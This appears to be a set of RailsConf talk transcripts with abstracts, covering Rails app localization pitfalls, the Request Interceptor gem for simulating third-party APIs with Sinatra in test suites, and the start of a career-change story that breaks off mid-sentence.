I studied cognitive science with an emphasis in linguistics. So I've done a bit of translating in an academic setting and was hoping I could maybe add some insight to folks who are maybe not as familiar with the translation process who are getting ready to translate things. So without any further ado, so you want to localize your app. You might feel like this dog especially if you're not familiar with a lot of the pitfalls that can come along in this process. So when should you think about localization? You should think about it now. Even if you don't actually foresee a future in which you want to have localized versions of your app, if you think about your possible audience, it is probably not just US-based English speakers. If you think about just the number of languages that are spoken just in the United States, if you're limiting yourself only to English speakers, you are really limiting yourself. So it's something that should be on your radar as a possible thing that might come down the line. And even if you never localize it, you won't be hurt by using some of these conventions and they can give you other wins in your development process. So when should you think, when should you internationalize? So you want to be thinking about this, again, before you need to. For example, don't hard code strings into your views. This is a very easy win. You can use locale keys in your views, have those reference a YAML file, and that way you can have all of the copy for your app separated out from the actual code. So say if you have someone who's not a developer who wants to make changes to copy, you don't have to have them dig through the code and make those changes. You can have them edit a YAML file, which is probably going to be much easier for everyone involved. So there are lots of built-in tools for Rails localization. There's this I18N guide, which goes over the basics of how to use those tools, how to create keys that you then reference in your app. The default setup for Rails localization is to have a YAML file, as I've alluded to a couple times, where you will have a key and a string. And when you reference that key in your application, that string will be pulled from the YAML file. And then you'll have YAML files for each locale, so you'll have a French one and an English one and so forth. And based on the locale setting on your app, the correct string will get pulled in. And there's a lot of things built in for you. There's also a localize, so there's I18N.t, which is translate that refers more to the pulling the correct strings. And there's also localize, which refers more to, as I was mentioning, the units of measurement, things like that, that'll be related to where the person is from. Okay. So you've got some YAML files with some strings in them. This can get annoying really fast, especially if you have, say, maybe hundreds of strings or thousands of strings or tens of thousands of strings in your app. Depending on how complex your app is, these files can get really unmanageable. So you should be thinking about whether this is something that is practical for you and for your app and your organization. One way you can maybe make it a little easier on yourself is to customize these YAML files to be per feature or something like that so that you don't have one single YAML file that's storing every single string that you use. But at the same time, this is still not something that you probably want to use for a super, super complex app. 
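Here is a small sketch of the flow just described: keys in per-locale YAML files under config/locales, looked up with I18n.t, plus I18n.l for locale-aware formatting. The key names and copy are invented, and the French date format assumes the rails-i18n locale data mentioned below is installed.

```ruby
# config/locales/en.yml:
#   en:
#     storefront:
#       greeting: "Welcome back"
#
# config/locales/fr.yml:
#   fr:
#     storefront:
#       greeting: "Bon retour"

I18n.locale = :en
I18n.t('storefront.greeting')   #=> "Welcome back"

I18n.locale = :fr
I18n.t('storefront.greeting')   #=> "Bon retour"
I18n.l(Date.new(2017, 4, 26))   #=> locale-aware date (given rails-i18n's :fr data)

# In a view you would normally write <%= t('storefront.greeting') %> rather than
# hard-coding the copy.
```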
Here are some helpful gems in your localization journey. One of them is Rails I18n. This provides tons of translations in different languages, different locales for the errors that are kind of baked into Rails, active record things, default date formatting, things like that so that you don't have to waste your time doing those things. So that is super helpful to kind of get your localization stuff off the ground. lochal app is a gem and provides a web interface for storing translations that translators can log into. It's a paid service. I'm not sure if there's a free tier, but something worth looking into if you're looking to add translations. And it's also tied to paid translation services so you can pay someone from there to actually go in and translate all your strings for you. Globalize is a tool you're going to want to use if you're adding translations to your active record models. So if you want to, say, localize attributes on a model, say you have a blog and your posts are stored as active record models and you want to have alternate versions of your blog posts in different languages, this would be the tool that you want to use for that. Through Geocoder, you can, the Geocoder gem, which also does a lot of other things, but one tool that will provide you is being able to set a lochal based on a user's IP address. So that's also super helpful. I18n Tasks is a gem that will go through and report keys in your YAML files that are missing or unused. It'll remove unused keys optionally, and it can also pre-fill missing keys from Google Translate if you want to play it fast and loose. One possible workaround for this YAML nightmare that we've described is proposed in this Rails Cast episode that you can look into. It provides a sort of framework for a Redis-based backend for the localkies. Another possibility would be to do, like, an active record or another database-based backend. The things that you'll want to keep in mind, though, are that these keys are going to, there's probably going to be tens, dozens of them loaded on every page, so they'll need to be accessed all of the time. And so in memory, store, or some sort of cache is probably going to be preferable to having to do a database lookup at every time a key is referenced. If you decide to just stick with the YAML, you can edit it the usual way, maybe in a graphical YAML editor. One thing that you might want to keep in mind when you're thinking about how exactly you want this translation backend to work is that the people who are doing your translations, who are going to be entering these keys, are not necessarily going to be developers. So if you've got people from the marketing department, if you've got professional translators, you probably don't want to tell them to, like, boot up Sublime Text and write some keys in. You probably want to provide some sort of gooey or graphical interface for them to make their lives a little bit easier. So these are the things that I feel like are most important to consider when you're talking about how you're going to localize something. First, you need to know what needs to be translated, kind of the scope of is this a 10,000 line project, is this a 100 line project? Do we need to hire a professional translator because we need really polished translations or will a Google translate situation be adequate to our needs? Do we need to translate the attributes of a model? 
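Since this section ends on translating model attributes, here is a rough sketch of what that looks like with the globalize gem mentioned above. The model, attributes, and copy are invented, and the gem also needs a post_translations table created through its migration helpers.

```ruby
# Translating ActiveRecord attributes with globalize (sketch).
class Post < ActiveRecord::Base
  translates :title, :body   # globalize stores these in a post_translations table
end

post = Post.create!(title: 'Hello')
I18n.with_locale(:fr) { post.update!(title: 'Bonjour') }

I18n.with_locale(:en) { post.title }  #=> "Hello"
I18n.with_locale(:fr) { post.title }  #=> "Bonjour"
```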
What are maybe the length of the strings that we want to translate related to, like, how readable maybe they'll be in, like, a YAML interface? Are there special characters that you'll need to think about whether your database or data store of choice supports? And what information, in addition to just those strings, is it helpful to provide to your translators? So what tools do they need to give you a really good translation? Maybe some contextual information, maybe a nice gooey so that they don't have to edit things in sublime text and push them to GitHub is maybe the best solution there. So this is something that I've come across in looking over apps that people have tried to localize. Any time you are concatenating, say, local keys together to form a single sentence, that's probably a point at which you need to look at your life and look at your choices and find out a way not to do that. The reason for that being the first in my parade of foolish assumptions and that is that fragments can be translated with any accuracy. The reason for that is probably clear to you if you've studied a foreign language, but syntaxes are different in different languages. The subject verb object ordering may be completely different. The verb may go at the end of the sentence. The context of the full sentence may be needed for conjugation or for gendering of nouns, things like that. Instead what you'll want to do is use, so there's an example here of a variable in a full sentence if you need to pass in the name of a column where you have an error or something like that or a proper noun. So the I-18-N in Rails will support this passing of variables so you can just pass in a key and a variable and the variable will get dropped into that key like so. So here has the errors variable and that way you can provide your translator with the full sentence and context in addition to the variable that will just be replaced. Another pitfall is assuming that pluralization works the same in other languages. I included a link to this very thorough sort of survey of pluralization rules in tons of different languages, but the gist of it is that in English we generally have the same pluralization for zero and more than one thing, kind of the same grammatical structure, and then a separate pluralization rule if there's one thing. Other languages do not necessarily do this in the same way. They may make different distinctions where zero things follows one rule, one thing follows another rule, more than one thing follows a third rule. So don't hard code these strings. Instead I-18-N provides you with a very useful count variable where you can just define these different keys for one other and zero and pass an integer in as a count and based on the value of that integer, the one other or zero key will be dropped into your view. Another thing to be aware of when you're translating is that other languages are not necessarily going to use the same level of specificity. You may need to provide more information to your translator than an English string will provide. So things to be aware of here are like gender. We talked about register. They'll need to know whether you're hoping to address your users in a more formal or informal register. Also the words, there just may be more specific words in the other language that they'll need to be aware of what exactly you're talking about. So for example, in Korean there are multiple words for the English word in, one to denote a snug fit in a container, one to denote a loose fit. 
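To make the interpolation and count points above concrete, here is a sketch with invented keys; the actual plural rules per language come from the locale data (for example via rails-i18n).

```ruby
# Pass whole sentences with variables, and let I18n pick the plural form.
#
# config/locales/en.yml:
#   en:
#     cart:
#       summary:
#         zero: "Your cart is empty"
#         one: "You have 1 item in your cart"
#         other: "You have %{count} items in your cart"
#     errors:
#       invalid_column: "The column %{column} could not be imported"

I18n.t('errors.invalid_column', column: 'shipping_address')
I18n.t('cart.summary', count: 0)  #=> "Your cart is empty"
I18n.t('cart.summary', count: 1)  #=> "You have 1 item in your cart"
I18n.t('cart.summary', count: 7)  #=> "You have 7 items in your cart"
```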
So these are just things that you should know, things that your translator might need to be aware of. Another thing to know is that a message cannot necessarily be conveyed in another language in the same physical space as it can in English. There in languages that use other character sets, the messages may be much shorter. You may have something that takes one line in English and two lines in French, a general rule that I followed when I was translating French was that it always seems to take more words and more characters to say the same thing in French that it doesn't English. For that reason, you'll need to think about what you want to do if you need to fit more characters in a space or if something will look weird if you have a much shorter string than the English one. Do you want to shrink the text down in certain situations? You probably want to avoid fixed height or width containers unless you're going to test whether that string fits in the fixed height or width container in every language that you support. So this is something to be aware of when writing CSS and doing more of the front-end work. Another scary thing. The text may not always be left to right. So there are a lot of design implications here. So this is screenshots from the BBC's website, one from their Arabic website and one from their North African French website. So you'll notice it's not just the text that's flipped. It's also the logo and some of the design elements, the search bars on the other side because the idea is that the eye will gravitate toward the right side rather than the left. So there are a lot of other design implications beyond just flipping the alignment of the text in the container. Your character set will not always be the Roman alphabet necessarily. So you should make sure that other characters, other character sets are supported if you're planning to support non-Roman alphabet languages. Okay, so you've got all this. You have all of these pitfalls in mind. You've got these wonderful YAML files that are filled with wonderful translations that people are making updates to all of the time. And you have merge conflicts constantly because everything is in a YAML file and everyone is editing it and it's terrible. You're very likely to get merge conflicts, especially if everything is in one place. And because the people doing your translating, adding your copy are not necessarily developers, you probably don't want everyone who makes copy to have access to, say, your code repo. So some things to do here can break up keys based on functionality, based on features. You can add your YAML files to make them a submodule of your main repo so that you can give people access to just the YAML files rather than giving them access to the whole repo. You can have a database store that people edit from that is then pulled into a YAML file in some way or you can just have a database backend for your translation keys. Or you can do something like locallop, which is a web-based interface where people can edit the keys and that can serve as your external source of truth so you don't have to trust those YAML files that are in your repo. You can just pull from that source and trust that everything is fine. The concerns that you'll have in mind, again, are ease of use based on who is doing your translations. You also probably want some sort of audit trail if someone accidentally deletes your English.yaml file. 
You want to have some rollback, like, catastrophe scenario, whether that's doing a daily database backup, whether that's keeping things in version control in some way, shape, or form. Those are things that you should have on your radar. So another thing that I sort of want to touch on is why do you want to translate your app? Which is not to say that I think it's a bad idea. I think it's great to support speakers of other languages to make our technology accessible in other places to non-English speakers. But when you are deciding to internationalize for a given region, for a given language, there are things that you want to think about before making that choice, before deciding who you want to translate your app for. An example is other countries have different norms around privacy. In general, I would say in the U.S., we're probably more fast and loose with some of our private information than in, say, Europe. There are things that may be considered more taboo to share, such as religion. People are maybe more likely to be sensitive about tracking, about physical location information of theirs being shared. So if your app uses those things, you should think about how that's going to be perceived in the language group in the country, in the culture that you're adapting it for. There may also be legal issues if you're actually intending for another country market. There are things like do not track in Europe. There are issues around, say, copyrighted information and the trouble that you can get into for sharing copyrighted information or copyrighted content in other countries. There are issues of defamation. The U.S., actually, I believe has one of the more lenient stances toward defamatory content. So if there's a chance that defamatory content can be included or disseminated through your app, be aware of the potential legal repercussions that you can face in any country that you're expanding to. Another issue is that the same needs may not exist in that place. So if your app centers around something related to, say, the U.S. healthcare market, that's probably not a thing that's going to translate in other countries. So maybe that leads you to the decision to translate your app for U.S.-based Spanish speakers, but not for Mexico-based Spanish speakers, for example. So my hope is that from this talk, you take away the following things. One of them is to think about localization now rather than later. And hopefully there are things that you can win even if you don't actually decide to do any translating. When you're translating something, be aware of the quality of translation that you need. And if you want a quality translation, your translators should have a good understanding of your app of how it works, of who it's intended for, of what it's intended to do. Also translation is hard. It's a hard problem that I don't think there are lots of easy solutions to. And it's something that if you care about having a quality product for non-English speakers, that you should invest your time in thinking about. And also to know your audience when you're deciding who you want to translate for. And with that, I'm going to be hanging out if anyone has questions. And then there's this slide, which is just all of my information. If anyone wants to get in touch, tweet at me, look at my GitHub, look at my website, I got Valerie.codes, which I think is awesome. And thank you so much for coming. Thank you.
|
Translation, be it a word, sentence, concept, or idea, for different audiences has always been a challenge. This talk tackles problems of translation, especially those that tend to crop up in building software. We'll dive into the eminently practical—how to design apps for easier localization, common pitfalls, solutions for managing translations, approaches to version control with translations—and the more subjective—possible impacts of cultural differences, and what makes a "good" translation.
|
10.5446/31512 (DOI)
|
Hi, everyone. My name is Konstantin Tenhardt and I have to warn you, this is not going to be a funny talk. I'm German. We don't do that. So, but I actually don't live in Germany anymore. Last year I moved to Ottawa, Canada and there's so many Ruby developers in Ottawa. I actually work for Shopify. And in fact, we have so many Ruby developers that we just don't know where to put them and we sent them all down to Kansas to speak at RailsCon. And so, Kat already gave a talk and there's two of us speaking later in the afternoon about how we test and about sprockets. To continue with the shameless self-promotion, you can find me on Twitter and GitHub. My handle is T60. And in my spare time, I'm maintaining a couple of libraries that you might find interesting. One of them is Action Widgets, which is a UI component micro framework, I'd say, for Ruby on Rails. In fact, the slides you just see here on screen are powered by Action Widgets. I'm maintaining smart properties, which is supercharged Ruby attribute assessors, as well as a processing pipeline for Ruby on Rails to model complex business processes. And finally, the one I want to talk today about, Request Interceptor, which is my most recent one. And it allows you to simulate foreign APIs with Sinatra. So, at its core, this talk is all about testing. And specifically, one type of test, tests that involve HTTP connections. So, most of you might know the libraries VCR and Webmark, which are usually used to stub out individual requests or in case of VCR replay requests that have previously been sent to a remote API. I want to present a different approach today and talk about how we can use Sinatra to simulate a foreign API within our test suite. And that is essentially the core idea behind Request Interceptor. So, I guess I best show you how to use the library first and then throughout the talk we dive deeper and deeper into how it actually works internally to the point where I'll show what kind of metaprogramming techniques I used to hook into the Net HTTP library to make all that magic happen. So, yeah, I just mentioned it. Request Interceptor does modify Net HTTP, just like Webmark and VCR. There is no clean way to sort of interject yourself into what Net HTTP does. So, some trickery is required to make that work. But I get back to that later. The idea is that you can use any rec-compatible app and use it as a Request Interceptor that sort of intercepts an HTTP request sent out by your application and reroutes it to your rack app, which will then handle the request in line. And in fact, all you need to know essentially is that Request Interceptor implements a run method which takes a rack application as well as a hostname pattern. So, the hostname pattern is important to know when Request Interceptor sort of starts intercepting requests. It will actually look at the HTTP request and only redirect the request to your own rack app if it matches the hostname. Otherwise, the HTTP request will be made just as a regular remote request. And in the code example here, I define the probably most minimal rack app you could potentially implement. It's simply a Lambda statement that returns an array with a status code, no headers, and a message, hello. And then I use Request Interceptor to intercept all requests that go to anything that ends with any host that ends with example.com. I do my HTTP request and then assert on the equality of the response being hello. The problem with bare metal rack apps is that they are very inconvenient. 
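Here is a reconstruction of that minimal example. The overall shape, a run method taking a Rack app and a hostname pattern, comes from the talk, but the exact argument order and pattern syntax are assumptions; the gem's README is the authority.

```ruby
# Reconstruction of the minimal example described above (API details assumed).
require 'request_interceptor'
require 'net/http'

hello_app = ->(_env) { [200, {}, ['hello']] }

# Intercept anything whose host ends in example.com and route it to hello_app.
RequestInterceptor.run(hello_app, /example\.com\z/) do
  body = Net::HTTP.get(URI('http://api.example.com/anything'))
  raise 'unexpected response' unless body == 'hello'
end
```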
To sort of implement something more feature complete, you wouldn't necessarily want to go with rack directly and set you want to pick something that has a little more, that provides you with a little more convenience. And for me, this convenience is sort of given by Sinatra which sort of combines simplicity as well as provides you with a lot of flexibility on how to simulate these API endpoints. And for those of you who don't know Sinatra, it is a Ruby micro web framework and it's based around a very simple idea. You have a Sinatra application that provides you with more or less, well, the most important methods are get, post, put, and delete which correspond to the HTTP methods and they allow you to define request handlers in your Sinatra application. So they take a path as the first argument and then a block and the block defines how requests are being handled. So simple Sinatra looks something like that. You don't even need to wrap it in a class or anything. It provides you with some magic to make this work and you require the library, you define that your application is handling anything that comes into slash hello and in this case it returns hello Sinatra. So given this conciseness and this simplicity, Sinatra was an excellent choice to sort of model APIs and therefore makes a great combination with request interceptor. In fact, I went further because of this great combination, it's the combination I would suggest for you to use instead of using requestinterceptor.run with just any rackup I would recommend using Sinatra and requestinterceptor gives you a defined method which allows you to define a new Sinatra application with some extra goodness. So a request interceptor allows you to define the hostname pattern. Again, just as we've seen before, where we submit the hostname pattern and the application to the run method, we now define it right on the application and then we just define it as a regular Sinatra app with all of our endpoints that we need. And the result of this define call is a class again which is a Sinatra application with the added benefits and one of those benefits is that this application provides you with an intercept method. And the intercept method is just a convenient wrapper for you around run. So instead of having to pass in everywhere where you want to use an interceptor, remember which hostname you want to match and which application to pass in, you can just call intercept on your interceptor, provide it with a block and then again a fire of an HTTP request and assert that the correct message is returned. And then more importantly in order to test this, you probably want to know how many requests you made, which requests you actually made and what the request and response data was. And to make this possible, the intercept method returns a transaction lock. So it's simply an array of request interceptor transactions. And these transactions are simply structs which give you access to the request and the response that was made within the block. And these are instances of Rackmok request and Rackmok response, just as other libraries usually use for testing Rack applications. I essentially use these to carry all the data for further inspection. And then the example down below shows you how you can, for instance, assert on the path of the first transaction lock entry. And in this case, I'm just asserting that my program called the path hello of example.com. You can also nest them in case you want to have, you communicate with multiple APIs. 
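Before the nesting discussion, here is a sketch of the Sinatra-flavored usage just described. RequestInterceptor.define, the hostname declaration, intercept, and the transaction log all follow the talk, but treat the exact DSL (especially how the host pattern is declared) as an assumption.

```ruby
# Sinatra-style interceptor definition and the transaction log (sketch).
ExampleApi = RequestInterceptor.define do
  host(/example\.com\z/)   # hostname pattern -- exact DSL name assumed from the talk

  get '/hello' do
    'hello'
  end
end

transactions = ExampleApi.intercept do
  Net::HTTP.get(URI('http://api.example.com/hello'))
end

transactions.length                #=> 1
transactions.first.request.path    #=> "/hello"
transactions.first.response.body   #=> "hello"
```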
And at Shopify, I was on the team that implemented the UBER rush integration. We did that as a separate app. So for us, Shopify was, we also treated Shopify as an API, just as you would if you develop an app for Shopify. And then we treated Uber as our other service. So our application was actually had to communicate with both of these services. And it's often necessary that you know exactly which requests were sent where. And that is why request interceptors do support nesting. So both of these interceptors write a separate transactional log. And yes, of course, the innermost interceptor takes precedence. So if you can actually have two interceptors responding to the same domain or to the same host, in which case the innermost would win and intercept the request. Another important feature is that you can customize an interceptor for an individual test because the idea is that you generally outline your service that you are modeling in a single file and then customize it to certain behavior that fits sort of the needs of your test. Let's say you want to model an error response for one particular endpoint. You would take your interceptor, call the dot customize method on it, and then override the previously defined endpoint. And Sinatra is smart enough that if you redefine an endpoint, the new endpoint will take precedence over the old one. And in this case, we are just switching the hello endpoint from to send another message. Previously it was high rescon, and now it's bonjour rescon. So now that you have a basic understanding on how they work, I want to talk a little about the advantages in comparison to VCR and WebMerc that I think exist when using request interceptors. For me, one of the biggest advantages is that the code isn't cluttered throughout your test suite. Instead, what we do is we have one file that defines a particular service, in our case Uber or Shopify, that implements all the endpoints we are usually communicating with. And then we customize this interceptor to specific needs in our test suite. But if you sort of want to see in one go what your app is actually communicating with, you would just open the file and look at the interceptor definition. Another advantage for me is that interceptors provide greater power and flexibility because we're talking about a Sinatra application. You can literally go as far as you want with that. You could have theoretically an in-memory database that sort of keeps state if you want to simulate entire workflows or you can keep it super simple and return static responses from your endpoints. So it's really up to you. Then, of course, since it's essentially just one file, you can also go further and package it into a Ruby gem. Let's say you build a service that other developers use and you have a public API and now you want to make it easier for people to sort of integrate your service, you could provide them with a predefined interceptor they can use in their test suite. So they don't even think about hitting your API with like requests from their test suite. And then finally, and that is personally for me super important is that the code is just very readable, which is in the nature of the Sinatra application. And I personally think it's more readable than having these WebMock stubs sort of scattered around your test suite. Instead, you have this one single application that defines how your interceptor works. And then there's more. There's features that I am not sure if you could simulate them with WebMock or CR. 
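A sketch of the customization and nesting just described. ExampleApi refers to the earlier sketch, while ShopifyApi and UberApi are hypothetical interceptors standing in for whatever services your app talks to; the endpoint body is invented.

```ruby
# Customizing an interceptor for one test, and nesting two interceptors.
FrenchExampleApi = ExampleApi.customize do
  get '/hello' do
    'bonjour RailsConf'   # overrides /hello only for tests that use this class
  end
end

shopify_transactions = ShopifyApi.intercept do     # ShopifyApi / UberApi are
  uber_transactions = UberApi.intercept do         # hypothetical interceptors
    # exercise code that talks to both services here; each interceptor keeps
    # its own transaction log, and the innermost one wins if patterns overlap
  end
end
```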
And so I want to talk a little bit about more advanced concepts on how to use these interceptors. A big one for me is simulating network requests. Reckless interceptors are set up in a way that they propagate errors or exceptions that are being raised in one of the endpoints. So I specifically disabled the Sinatra functionality to handle exceptions and propagate them through the entire stack, which allows, for instance, to simulate that a host is unreachable simply by raising the appropriate exception, which makes it very easy to test your application or the library or building whether it's robust enough to handle these error cases. And then, of course, Sinatra gives you a lot of tools that you can leverage to make interceptor definition even easier and make the code more readable. And one of the most important things is probably that being a standard Ruby class, you can just define private helper methods that you can use throughout your interceptor and throughout the customizations you use in your test suite. In fact, you can just apply standard object orient design principles to, and all that Ruby gives you to sort of make your interceptors as readable and as easy to use as possible. Then there is the possibility of using Sinatra's before and after callbacks that run before or after a particular endpoint is hit. And you could, for instance, utilize an after callback to automatically encode data into JSON. Let's say you're modeling a JSON API. It's tedious if in any endpoint you always have to remember that you, as a last step, have to call to JSON on whatever you're sending over the wire. So just define it once in a block. And in this case, I look at the response and if it's an array or hash, I encode it into JSON. And then, of course, you have the ability to use rec middleware. And in this case, we modeled both Shopify and Uber interceptors as API, as JSON APIs. And so we always wanted to decode the incoming JSON so we can easily work with that in our interceptors. And Sinatra provides you with a method called use that allows you to inject rec middleware that runs before your actual endpoint is hit. Now that you have sort of an understanding on how you use interceptors and why they might provide a nice alternative to VCR or WebMock, I actually want to dive deeper into some of the internals because I just think it's interesting to see some of the powerful features Ruby provides and just as a sort of learning exercise. So in the beginning of the talk, I showed you that a request interceptor.run is sort of the core of the whole idea. And in fact, this is the concrete method implementation as it exists in the library. And there's essentially six steps and I will go over all of these six steps to sort of showcase how you can mess with an existing Ruby library that doesn't provide you with the ability to sort of do this in a clean way. So the first step is because you can reuse an interceptor is to clear the transaction lock. That's very easy. I just clear the array that keeps all the transaction lock entries from the previous run. And then I cache the original net HTTP methods because we have to make sure that once the block finished its execution, we restore net HTTP to its default behavior. And then I override the net HTTP methods with the custom implementation just as WebMock does as well. And then I execute my test. And now my test will essentially use these overridden net HTTP methods. And then finally I collect my transactions and then eventually restore net HTTP to its former glory. 
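A sketch pulling together the advanced pieces above: a helper method, and an endpoint that raises a real network error, which reaches the test because (per the talk) the interceptor's Sinatra app runs with show_exceptions disabled and raise_errors enabled. Paths and payloads are invented, and the host declaration is again an assumption.

```ruby
require 'json'

FlakyApi = RequestInterceptor.define do
  host 'api.example.com'

  helpers do
    # Sinatra helper shared by all endpoints in this interceptor.
    def json(payload)
      content_type :json
      JSON.generate(payload)
    end
  end

  get '/hello' do
    json(message: 'hello')
  end

  get '/down' do
    # Propagates to the code under test, since exceptions are not swallowed.
    raise Errno::ECONNREFUSED
  end
end
```

A test wrapping a request to /down in FlakyApi.intercept can then assert on how the client code handles the connection error.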
And the last part happens in an insure part. So it's always guaranteed to run and so that it doesn't happen that your test suite actually gets into a state where it's where net HTTP is not in its original state. So as I said, it's easy to clear the transaction lock. So I just want to skip that and talk about caching the original methods. There's three methods you need to override if you want to do something like incepting HTTP requests. Just start, finish, and request. So to finish, sort of take care of opening the TCP connection and then request performs the actual heavy lifting. And the way caching works in request interceptor, you have now a concrete request interceptor instance at your hand that is currently handling your test case. And I just assign these methods to instance variables. And what instance method gives me is an unbound method. So I essentially save the original method implementation and just put them for now in an instance variable. And then I replace these three methods with my own implementation. Start and finish are pretty boring. I just make sure that net HTTP things, it has an open TCP connection it is communicating with, but in fact I don't need one because of how the redirect to the Synapri application is working. And I'll show that in a second. And then I define a new request method, which is a little more interesting. The interceptor instance itself that is currently handling your test case has a request method of its own. And all I really do is I take the data that would usually go to net HTTP request and redirect it to my interceptor. And then I also pass in the interceptor itself. I won't show the code for request interceptor request because it's a little more complex, but I at least want to explain what is going on. And you can always take a look at the source code if you're interested. So the first thing I do is I try to find an appropriate interceptor, meaning I look at the HTTP request and then look at the host name of this request and now go through my list of host name patterns and stored applications and see if one matches. If I find one, I now build a mock request and mock request, the initializer of mock request takes a rack application as its first argument. Once I have that mock request initialized, I can call the methods get, post, put, delete on them to simulate an actual HTTP transaction. And once that happened, I get back a mock response, which I now have to transform into a net HTTP response to make net HTTP believe that it actually just talked to remote service. And then I log the transaction, meaning now I'm taking the mock request and the mock response and just writing them in my transaction log so they can be further analyzed in a test suite. The interesting thing is what happens if no interceptor actually matches your host name because I wanted to implement it in an unobtrusive way. I didn't want it to block just any HTTP communication, especially to be still compatible with MAPMAC and VCR. So what happens is my current net HTTP instance, which is now in this weird state that it talks to the Sinatra application, has to be restored to actually be able and perform network requests. And the way I do this is shown on the next slide. But once I restored it, I essentially perform the request as if there would never have been any interceptors in the way. And method restoring works by utilizing Ruby's defined method, which actually can not just take a block, but it can also take an unbound method. 
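For readers who want to see the shape of that instance_method / define_method dance, here is a stripped-down illustration. It is not the gem's actual source, just the general trick of caching an UnboundMethod and rebinding it later; the handler argument is a placeholder for the interceptor's own request method.

```ruby
# Simplified illustration of hooking and restoring Net::HTTP#request.
module NetHTTPHook
  def self.install(handler)
    @original_request = Net::HTTP.instance_method(:request)   # cache an UnboundMethod

    Net::HTTP.send(:define_method, :request) do |request, body = nil, &block|
      handler.call(self, request, body)   # reroute to the interceptor instead
    end
  end

  def self.uninstall
    # define_method also accepts an UnboundMethod, which restores the original.
    Net::HTTP.send(:define_method, :request, @original_request)
  end
end
```

The real gem does the equivalent per run, for start, finish, and request, and restores everything inside an ensure block as described above.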
So the ones we previously stored in instance variables, we can now rebind to net HTTP. And we can even rebind them to concrete instances of net HTTP. And it is sort of happening when the request interceptor doesn't find a matching application. It rebinds the original methods to the concrete net HTTP request that's currently going on and then just calls request again and performs the request as if nothing ever happened. So that was essentially the internals of how the request cycle works in request interceptor. And if you compare that to WebMorque, there's certainly similarities with the difference that you define a stub within your test. And in this case, I redirect to the Sinatra application. I previously mentioned that there is error propagation that you can utilize to sort of simulate network errors. And I just wanted to quickly show how this works. It is very simple because Sinatra supports it by just using particular configuration statements. So all you need to do to sort of have a Sinatra application actually raise an exception and not handle it and have the calling code take care of that exception is you disable the show exceptions and you enable raise errors. And by that, you sort of switch Sinatra into an aggressive mode, which does not make sense if Sinatra runs in a product as your production application, but it makes a lot of sense to sort of simulate these network request errors. Well, I do have further plans for request interceptor. So one thing I want to implement is the support of traits, sort of similarly named like the factory girl mechanism where you can define what your factory is building and then give it a certain trait of how it is actually building. And I want that for interceptors as well because I was running into the issue that I was simulating the same endpoint several times. And what I did so far was just having a lot of these customized request interceptors. But what I actually want is just in a particular test case, I want to have a name where I can refer to an endpoint definition and say I want my interceptor to run with a faulty implementation of my hello. And the faulty implementation could either be raising a 500 or raising a network error. And I want to support different adapters. So I don't want to just stop at net HTTP. The next thing I want to implement would be Faraday because Faraday would give me exposure to several other libraries because I don't really want to do a mess around with each of these libraries individual. Yeah, that is sort of the two goals I have in mind right now to bring this library forward. And that basically brings me to the end of my talk. And I just want to quickly summarize what I've been talking about. So request interceptors sort of provide a third alternative to VCR and Webmark. The thing I like most of them is that I have a concise service definition in one place instead of scattering this definition across the entire test suite. And they provide me with an easy mechanism to customize them if there is the requirement in a certain test. And then finally, Sinatra provides we with a lot of simplicity and flexibility which ultimately leads to very readable code, which is just something I greatly enjoy. If you're interested to take a look at the slides again because I know it was a lot of content I was going over, they are available online. Thanks a lot for your attention.
|
Nowadays, we often rely on third party services that we integrate into our product, instead of building every aspect of an application. In many cases, well written API clients exist, but on occasion you run into the issue that there isn't a ready to use client or it simply doesn't fit your needs. How do you write a good API client and more importantly how do you test it without hitting the remote API. So far, the standard approach has been replaying requests with VCR or stubbing them with Webmock. There is a third option: simulating foreign APIs with Sinatra from within your test suite!
|
10.5446/31514 (DOI)
|
Thanks for coming to the last talk on the second day. I'm sure you guys are totally jump into go out and enjoy the rest of the evening but I appreciate you taking time to come tonight. I'm Teresa Martini and I'm gonna the title is director to Intern Changing Careers as a Single Mom but really the core of what I'll be talking about is humility and audacity and facing things in our lives that feel impossible and sitting with the discomfort of that. I work with OMARA Health and we support people with preventing chronic disease so the majority of our participants might be in situations where they're prediabetic or have heart disease and we provide a program for that. But before I got to this place in my life I guess the other big piece about this talk is this isn't a tech talk or a how-to this is more of a story and and the journey that I've been on for a while now and so I'm gonna start at the beginning when I was a Florida Gator any Gator fans in the audience? No, at least like no none. So I was a Gator and but I didn't get an engineering degree as a Gator I got a degree in anthropology and but can't really get much of a job with a degree in anthropology or an aspiring degree in anthropology so I ended up working at the Northeast Regional Data Center on campus and began learning HTML and this was back when HTML was called Wilbur. It was HTML 3.2 and so it was in 1997 and websites looked like this and and this was the good shit and and so I started my career then and then over the next couple of years learning HTML standard generalized market language. In 1999 I started learning cold fusion back when it was a layer of cold fusion and and I learned that by just kind of like poking over somebody's shoulder on another team and being like that's really cool what are you doing that seems way better than what we're doing with these static HTML templates and they were like yeah come on come learn with us and so I went and joined another team and started moving my way up and and so I did that for a couple of years I did cold fusion in spectra and started working my way into Java and and then the 2001 bubble burst and mind you this whole time in my head I'm thinking why the fuck are these people paying me so much money to do this I don't have a degree in it it's not my background and I this the imposter syndrome was really deep I was always the only woman on my team I never met another woman engineer so this is amazing to me and so when the bubble burst and I knew all kinds of senior engineers who knew Java fully weren't just starting to learn it and they couldn't get work because kind of work was so slow I was like well you know oh this is also sorry just jumping head a little bit so to give you a context if you were young enough that you weren't around back then employment declined by about 17% loss of 85,000 jobs and so if you look at this 97 is when I got started and then the peak went up and then 2001 is when when the bubble burst on this graph and so you know I figured you know until things pick up you know until I get another gig I'm gonna go volunteer with domestic violence agency it's in town I was in San Francisco at the time and and so I started volunteering and then they're like oh we really need someone to fill this position would you mind just working for us for a little bit I know you're you're that's not your career you've got one more experience that just just for a little bit like sure like glorified volunteering that's about how much you got paid and but the thing is is this is how 
